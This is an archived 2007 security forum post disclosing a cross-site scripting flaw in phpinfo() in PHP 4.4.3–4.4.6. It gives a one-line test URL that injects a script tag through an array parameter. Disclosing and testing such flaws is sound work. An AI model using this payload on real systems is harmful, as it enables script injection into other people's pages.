邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-3-8 22:50

PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability

[code]

To manually test for this vulnerability just call the phpinfo() page with a parameter like this.

[url]http://localhost/phpinfo.php?a[/url][]=<script>alert(/XSS/);</script>
[/code]

页: [1]
© 1999-2008 EvilOctal Security Team